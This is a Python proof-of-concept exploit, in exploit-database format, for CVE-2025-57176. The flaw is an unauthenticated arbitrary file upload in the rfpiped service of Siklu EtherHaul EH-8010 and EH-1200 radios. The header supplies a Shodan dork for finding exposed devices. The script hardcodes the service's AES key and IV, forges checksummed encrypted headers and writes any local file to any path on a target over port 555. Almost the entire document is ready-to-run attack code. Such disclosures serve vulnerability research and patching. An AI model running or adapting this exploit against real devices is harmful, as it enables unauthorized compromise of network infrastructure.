# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES
# TCP port that main() connects to on the target.
PORT = 555
# Size in bytes of the fixed header built by build_header() and read back
# by RFPipeSession.recv_header().
HDR_LEN = 0x90
# Initial CBC IV used for both directions of a session: four 32-bit words,
# each serialised little-endian, 16 bytes in total.
IV0 = b''.join(
    struct.pack('<I', word)
    for word in (0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
)
# 32-byte key handed to AES.new() by RFPipeSession.
KEY = bytes.fromhex(
    '89 E7 FF BE EB 2D 73 F5'
    'A9 10 FC 42 5B 1F 36 17'
    '9F B9 5E 75 35 A3 42 A0'
    '5D 02 48 B1 19 D2 4B 82'
)
def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly ``n`` bytes from ``sock``.

    Keeps calling ``sock.recv`` for the bytes still missing until ``n``
    bytes have been collected.

    Args:
        sock: Connected socket to read from.
        n: Number of bytes wanted; zero or less yields ``b''`` without
            touching the socket.

    Returns:
        The ``n`` bytes read, in arrival order.

    Raises:
        ConnectionError: ``recv`` returned no data before ``n`` bytes
            had arrived.
    """
    pieces = []
    missing = n
    while missing > 0:
        piece = sock.recv(missing)
        if not piece:
            raise ConnectionError('socket closed')
        pieces.append(piece)
        missing -= len(piece)
    return b''.join(pieces)
def pad16_zero(b: bytes) -> bytes:
    """Zero-pad ``b`` up to the next multiple of 16 bytes.

    Input whose length is already a multiple of 16 (including empty
    input) is returned unchanged.
    """
    remainder = len(b) % 16
    if remainder:
        return b + bytes(16 - remainder)
    return b
def hdr_checksum(hdr: bytes) -> int:
    """Return the additive checksum of a header.

    Adds up the byte values of ``hdr[0:0x0C]`` and ``hdr[0x10:HDR_LEN]``,
    skipping the four bytes at 0x0C-0x0F (where ``build_header`` stores
    the result), and truncates the total to 32 bits.
    """
    leading = hdr[:0x0C]
    trailing = hdr[0x10:HDR_LEN]
    total = sum(leading)
    total += sum(trailing)
    return total & 0xFFFFFFFF
def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
    """Build the plaintext ``HDR_LEN``-byte request header.

    Layout written by this function (all other bytes stay zero):

    * offset 0x00: ``flag`` (low 8 bits)
    * offset 0x01: ``msg`` (low 8 bits)
    * offset 0x08: ``payload_len`` as little-endian uint32
    * offset 0x0C: ``hdr_checksum`` of the finished header, little-endian
      uint32
    * offset 0x10 to the end: NUL-terminated ``path``

    Args:
        flag: Value for byte 0.
        msg: Value for byte 1.
        payload_len: Payload length recorded in the header.
        path: Path bytes; a trailing NUL is appended when missing.

    Returns:
        The header as immutable ``bytes`` of length ``HDR_LEN``.
    """
    hdr = bytearray(HDR_LEN)
    hdr[0] = flag & 0xFF
    hdr[1] = msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
    max_path = HDR_LEN - 0x10
    # Clamp to one byte less than the field so the terminator always fits;
    # clamping after appending the NUL would cut the NUL off an over-long
    # path and emit an unterminated string.
    field = path[:max_path - 1]
    if not field.endswith(b'\x00'):
        field += b'\x00'
    # Same-length slice assignment keeps the header at exactly HDR_LEN bytes.
    hdr[0x10:0x10 + len(field)] = field
    # The checksum goes in last so that it covers every other field.
    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
    return bytes(hdr)
class RFPipeSession:
    """AES-CBC state for one connection.

    Each direction keeps its own chaining IV: both start at ``iv0`` and
    are replaced by the last ciphertext block of every message sent or
    received, so a fresh cipher object per message continues the chain.
    """

    def __init__(self, key: bytes, iv0: bytes):
        """Store the AES key and seed both directions with ``iv0``."""
        self.key = key
        self.send_iv = iv0
        self.recv_iv = iv0

    def enc_send(self, sock: socket.socket, data: bytes) -> None:
        """Encrypt ``data`` with the current send IV and transmit it.

        ``data`` is handed to the cipher as-is; no padding is applied
        here, so callers pass block-aligned input.
        """
        if not data:
            # Nothing to send. Without this guard the IV update below would
            # store b'' (ct[-16:] of an empty ciphertext) and break every
            # later send on this session.
            return
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
        ct = cipher.encrypt(data)
        self.send_iv = ct[-16:]
        sock.sendall(ct)

    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
        """Receive and decrypt a message carrying ``n_plain`` plaintext bytes.

        Reads ``n_plain`` rounded up to a multiple of 16 ciphertext bytes,
        decrypts them with the current receive IV and returns the first
        ``n_plain`` bytes. Returns ``b''`` without reading when
        ``n_plain`` is zero or negative.

        Raises:
            ConnectionError: propagated from ``recv_exact`` when the peer
                closes early.
        """
        if n_plain <= 0:
            return b''
        n_padded = (n_plain + 15) & ~15
        ct = recv_exact(sock, n_padded)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt[:n_plain]

    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
        """Encrypt and send a header.

        Raises:
            ValueError: ``hdr_plain`` is not exactly ``HDR_LEN`` bytes.
        """
        if len(hdr_plain) != HDR_LEN:
            raise ValueError('header must be 0x90 bytes')
        self.enc_send(sock, hdr_plain)

    def recv_header(self, sock: socket.socket) -> bytes:
        """Receive and decrypt one ``HDR_LEN``-byte header."""
        # HDR_LEN is already a multiple of 16, so dec_recv reads and returns
        # exactly HDR_LEN bytes.
        return self.dec_recv(sock, HDR_LEN)
def connect_any(host: str, port: int) -> socket.socket:
    """Open a TCP connection to ``host``, trying every resolved address.

    Resolves ``host`` for any address family and attempts each result in
    order, returning the first socket that connects.

    Args:
        host: Hostname or IPv4/IPv6 literal.
        port: TCP port number.

    Returns:
        A connected stream socket; the caller owns it and must close it.

    Raises:
        ConnectionError: no resolved address could be connected to; the
            last underlying ``OSError`` is chained as the cause.
        socket.gaierror: name resolution itself failed.
    """
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    last_err = None
    for fam, st, proto, _, sa in infos:
        s = None
        try:
            # Socket creation sits inside the try: an unsupported address
            # family must fall through to the next candidate, not abort.
            s = socket.socket(fam, st, proto)
            s.connect(sa)
        except OSError as e:
            last_err = e
            if s is not None:
                s.close()
        else:
            return s
    raise ConnectionError(f'connect failed: {last_err}') from last_err
def main():
    """Command-line entry point: upload a local file with a msg 0x04 request.

    Parses the arguments, builds the header for ``--path``, sends the
    header followed by the zero-padded file content over an encrypted
    session to ``target`` on ``PORT`` and, with ``--recv``, prints the
    server's response header and any response body.
    """
    ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
    ap.add_argument('target', help='IPv4/IPv6 address')
    ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
    ap.add_argument('--file', required=True, help='local file to send as payload')
    ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
    args = ap.parse_args()

    path_bytes = args.path.encode('utf-8')
    # The header's path field is HDR_LEN - 0x10 bytes and must also hold the
    # NUL terminator. Reject a longer path up front, because clamping it
    # would upload to a different remote path than the one requested.
    max_path = HDR_LEN - 0x10 - 1
    if len(path_bytes) > max_path:
        ap.error(f'--path is {len(path_bytes)} bytes once UTF-8 encoded; '
                 f'the header field holds at most {max_path}')

    with open(args.file, 'rb') as f:
        payload = f.read()

    hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)
    sess = RFPipeSession(KEY, IV0)
    with connect_any(args.target, PORT) as s:
        sess.send_header(s, hdr_plain)
        if payload:
            # The header carries the true length; only the bytes on the wire
            # are padded to the cipher block size.
            sess.enc_send(s, pad16_zero(payload))
        if not args.recv:
            return
        rh = sess.recv_header(s)
        flag = rh[0]
        rmsg = rh[1]
        rlen = struct.unpack_from('<I', rh, 0x08)[0]
        print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
        # NOTE(review): responses of type 0x03/0x05 are treated as having no
        # body to read; confirm against the protocol.
        if rmsg in (0x03, 0x05):
            return
        if rlen:
            body = sess.dec_recv(s, rlen)
            if body.endswith(b'\x00'):
                body = body[:-1]
            try:
                print(body.decode('utf-8', errors='replace'))
            except UnicodeError:
                # decode() cannot fail with errors='replace', but print() can
                # when stdout's encoding cannot represent the text.
                print(body.hex())


if __name__ == '__main__':
    main()